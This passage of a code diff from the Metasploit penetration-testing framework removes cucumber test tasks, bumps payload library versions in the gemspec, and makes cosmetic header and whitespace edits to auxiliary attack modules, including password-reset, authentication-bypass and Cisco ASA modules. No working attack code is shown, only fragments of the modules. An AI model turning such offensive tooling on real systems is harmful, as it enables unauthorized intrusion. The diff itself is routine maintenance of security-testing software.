-      t.binary = vendored_cucumber_bin
-      t.fork = true # You may get faster startup if you set this to false
-      t.profile = 'rerun'
-    end
-
-    desc 'Run all features'
-    task :all => [:ok, :wip]
-
-    task :statsetup do
-      require 'rails/code_statistics'
-      ::STATS_DIRECTORIES << %w(Cucumber\ features features) if File.exist?('features')
-      ::CodeStatistics::TEST_TYPES << "Cucumber features" if File.exist?('features')
-    end
-  end
-  desc 'Alias for cucumber:ok'
-  task :cucumber => 'cucumber:ok'
-
-  task :default => :cucumber
-
-  task :features => :cucumber do
-    STDERR.puts "*** The 'features' task is deprecated. See rake -T cucumber ***"
-  end
-
-  # In case we don't have ActiveRecord, append a no-op task that we can depend upon.
-  task 'db:test:prepare' do
-  end
-
-  task 'db:config:restore' do
-    require 'metasploit/framework/database/cucumber'
-    Metasploit::Framework::Database::Cucumber.restore_project_configurations
-  end
-
-  # Restore the config/database.yml from config/database.cucumber.yml before attempting to copy development to test
-  # database in order to recover from interrupted cucumber runs
-  task 'environment' => 'db:config:restore'
-
-  task :stats => 'cucumber:statsetup'
-rescue LoadError
-  desc 'cucumber rake task not available (cucumber not installed)'
-  task :cucumber do
-    abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
-  end
-end
-
-end

lib/tasks/custom_cucumber.rake

@@ -1,30 +0,0 @@
-unless ARGV.any? {|a| a =~ /^gems/} # Don't load anything when running the gems:* tasks
-
-vendored_cucumber_bin = Dir["#{Rails.root}/vendor/{gems,plugins}/cucumber*/bin/cucumber"].first
-$LOAD_PATH.unshift(File.dirname(vendored_cucumber_bin) + '/../lib') unless vendored_cucumber_bin.nil?
-
-begin
-  require 'cucumber/rake/task'
-
-  namespace :cucumber do
-    Cucumber::Rake::Task.new({:boot => 'db:test:prepare'}, 'Run features that should pass') do |t|
-      t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
-      t.fork = true # You may get faster startup if you set this to false
-      t.profile = 'boot'
-    end
-    Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
-      t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
-      t.fork = true # You may get faster startup if you set this to false
-      t.profile = 'exploit'
-    end
-    
-  end
-
-rescue LoadError
-  desc 'cucumber rake task not available (cucumber not installed)'
-  task :cucumber do
-    abort 'Cucumber rake task is not available. Be sure to install cucumber as a gem or plugin'
-  end
-end
-
-end

metasploit-framework.gemspec

@@ -13,6 +13,7 @@ end
 $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
 require 'metasploit/framework/version'
 require 'metasploit/framework/rails_version_constraint'
+require 'msf/util/helper'
 
 Gem::Specification.new do |spec|
   spec.name          = 'metasploit-framework'
@@ -24,7 +25,8 @@ Gem::Specification.new do |spec|
   spec.homepage      = 'https://www.metasploit.com'
   spec.license       = 'BSD-3-clause'
 
-  if File.directory?(File.join(File.dirname(__FILE__), ".git"))
+  # only do a git ls-files if the .git folder exists and we have a git binary in PATH
+  if File.directory?(File.join(File.dirname(__FILE__), ".git")) && Msf::Util::Helper.which("git")
     spec.files         = `git ls-files`.split($/).reject { |file|
       file =~ /^documentation|^external/
     }
@@ -68,9 +70,9 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.2.37'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.2.44'
   # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # get list of network interfaces, like eth* from OS.
@@ -134,7 +136,7 @@ Gem::Specification.new do |spec|
   # Library for Generating Randomized strings valid as Identifiers such as variable names
   spec.add_runtime_dependency 'rex-random_identifier'
   # library for creating Powershell scripts for exploitation purposes
-  spec.add_runtime_dependency 'rex-powershell'
+  spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"]
   # Library for processing and creating Zip compatbile archives
   spec.add_runtime_dependency 'rex-zip'
   # Library for parsing offline Windows Registry files

modules/auxiliary/admin/2wire/xslt_password_reset.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
@@ -131,11 +130,10 @@ class MetasploitModule < Msf::Auxiliary
         cookies = res.get_cookies
         if cookies && cookies.match(/(.*); path=\//)
           cookie= $1
-          print_status("Got cookie #{cookie}. Password reset was successful!\n")
+          print_good("Got cookie #{cookie}. Password reset was successful!\n")
         end
       end
     end
 
   end
-
 end

modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Auxiliary::Report
 
@@ -178,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary
   def run
     exploit
   end
-
 end

modules/auxiliary/admin/appletv/appletv_display_image.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -13,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q(
         This module will show an image on an AppleTV device for a period of time.
         Some AppleTV devices are actually password-protected, in that case please
-        set the PASSWORD datastore option. For password bruteforcing, please see
+        set the PASSWORD datastore option. For password brute forcing, please see
         the module auxiliary/scanner/http/appletv_login.
       ),
       'Author'         =>

modules/auxiliary/admin/appletv/appletv_display_video.rb

@@ -1,12 +1,11 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'uri'
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -21,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
         recommended. Also, if you're playing a video, the URL must be an IP
         address. Some AppleTV devices are actually password-protected; in that
         case please set the PASSWORD datastore option. For password
-        bruteforcing, please see the module auxiliary/scanner/http/appletv_login.
+        brute forcing, please see the module auxiliary/scanner/http/appletv_login.
       ),
       'Author'         =>
         [
@@ -152,5 +151,4 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Video request sent. Duration set: #{datastore['TIME']} seconds")
     play_video_uri
   end
-
 end

modules/auxiliary/admin/atg/atg_client.rb

@@ -1,6 +1,5 @@
 ##
-# encoding: utf-8
+# This module requires Metasploit: https://metasploit.com/download
-# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

modules/auxiliary/admin/aws/aws_launch_instances.rb

@@ -1,12 +1,11 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'metasploit/framework/aws/client'
 
 class MetasploitModule < Msf::Auxiliary
-
   include Metasploit::Framework::Aws::Client
 
   def initialize(info = {})

modules/auxiliary/admin/backupexec/dump.rb

@@ -1,12 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::NDMP
 
   def initialize(info = {})
@@ -271,5 +268,4 @@ class MetasploitModule < Msf::Auxiliary
     disconnect
 
   end
-
 end

modules/auxiliary/admin/backupexec/registry.rb

@@ -1,12 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::DCERPC
   include Msf::Post::Windows::Registry
 
@@ -270,5 +267,4 @@ class MetasploitModule < Msf::Auxiliary
       NDR.long(hive)
     return stub
   end
-
 end

modules/auxiliary/admin/chromecast/chromecast_reset.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -79,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary
       disconnect
     end
   end
-
 end

modules/auxiliary/admin/chromecast/chromecast_youtube.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -85,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary
       disconnect
     end
   end
-
 end

modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb

@@ -1,9 +1,9 @@
 ##
-# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::SNMPClient
   include Msf::Auxiliary::Cisco
 
@@ -219,5 +219,4 @@ class MetasploitModule < Msf::Auxiliary
 
     ver
   end
-
 end

modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner

modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb

@@ -1,12 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})

modules/auxiliary/admin/db2/db2rcmd.rb

@@ -1,10 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::SMB::Client
 
   def initialize(info = {})

modules/auxiliary/admin/dns/dyn_dns_update.rb

@@ -1,8 +1,9 @@
 # -*- coding: binary -*-
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+
 require 'dnsruby'
 
 class MetasploitModule < Msf::Auxiliary